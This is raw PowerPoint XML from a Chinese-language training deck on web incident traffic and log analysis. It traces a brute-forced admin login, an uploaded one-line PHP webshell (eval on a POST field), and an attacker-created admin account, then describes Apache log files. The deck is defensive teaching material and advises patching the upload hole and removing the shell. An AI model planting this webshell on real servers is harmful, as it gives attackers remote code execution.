                </a:solidFill>
              </a:rPr>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DedeUserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DedeUserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表示用户登录成功，即黑客爆破获得管理员账户密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在黑客发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报文中有如下内容：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86780DED-7940-48DE-BB30-993A4BAD0ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="251520" y="5250656"/>
            <a:ext cx="11444934" cy="1445488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F87A09-44F6-4CA7-95B3-CF3DB6AD54FE}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230187273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3595665" y="612725"/>
            <a:ext cx="11346735" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报文头内容为：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A7FDFDB-BD28-4937-94CD-312F15247A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2472492" y="1074390"/>
            <a:ext cx="4978896" cy="5596964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C48565-7596-4626-85A3-994B22CE7B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-1" b="3445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082792" y="3989678"/>
            <a:ext cx="4862774" cy="2562038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53874C95-22F9-4B66-91C2-CBF21BED72F9}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204036408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143339" y="1907507"/>
            <a:ext cx="11346735" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即黑客上传了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>脚本文件，是一个包含内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php eval($_POST[g]);?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的一句话木马。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在黑客上传完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求报文中有如下内容：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E0ACC6-6101-4E73-A878-D95BF8482832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="6728"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2149324" y="3072754"/>
            <a:ext cx="6069149" cy="3937444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05478DA1-0DC8-4260-960D-9D1A431A2603}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338909538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143339" y="1907507"/>
            <a:ext cx="11346735" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即黑客调用一句话木马，传入指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，并且可以看出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存放的地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jian.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对于安全维护人员而言就应该及时修复存在的文件上传漏洞，以及及时清除黑客留下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>继续分析黑客发送的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求，可以发现黑客通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行的系统指令：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DA49A6-4559-4D7F-8749-438ADC5FBD4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="6014442"/>
            <a:ext cx="11346735" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即黑客创建了管理员账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，这时应该及时检查系统中的用户列表，删除未知账户防止再次被黑客利用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98FED1B-372C-4379-AC47-69F4A8F8C02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730307" y="3833086"/>
            <a:ext cx="6586841" cy="2181356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339692107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2234078"/>
            <a:ext cx="11346735" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Apache HTTP Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>软件基金会的一个开放源码的网页服务器软件，可以在大多数计算机操作系统中运行。由于其跨平台和安全性，被广泛使用，是最流行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器软件之一。它快速、可靠并且可通过简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扩展，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等解释器编译到服务器中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269955747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2234078"/>
            <a:ext cx="11346735" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日志分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器日志记录了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器接收处理请求及运行时错误等各种原始信息。通过对日志进行统计、分析和综合，就能有效地掌握服务器的运行状况、发现和排除错误原因、了解客户访问分布等，更好地加强系统的维护和管理。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务模式主要有三个步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	服务请求，包含用户端的众多基本信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址、浏览器类型、目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	服务响应，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器接收到请求后，按照用户要求运行相应的功能，并将信息返回给用户。如果出现错误，将返回错误代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	追加日志，服务器将对用户访问过程中的相关信息以追加的方式保存到日志文件中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193253385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1907507"/>
            <a:ext cx="11346735" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日志类型　　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的标准中两种日志类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	错误日志　　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	/var/logs/apache2/error.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包括获知失效链接，获知 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>错误，获知用户认证错误。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	访问日志　　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	/var/log/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>access.logcommon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	/var/log/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>referer.logreferer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	/var/log/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>agent.logagent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>访问者访问本地网站的远程机器的地址，可以得知浏览者来自何方；浏览者访问的资源，可以知道访问者对哪部分内容感兴趣；浏览者的浏览时间和浏览者使用的浏览器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317355935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1907507"/>
            <a:ext cx="11346735" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>自定义日志格式</a:t>
            </a:r>
          </a:p>
          <a:p>
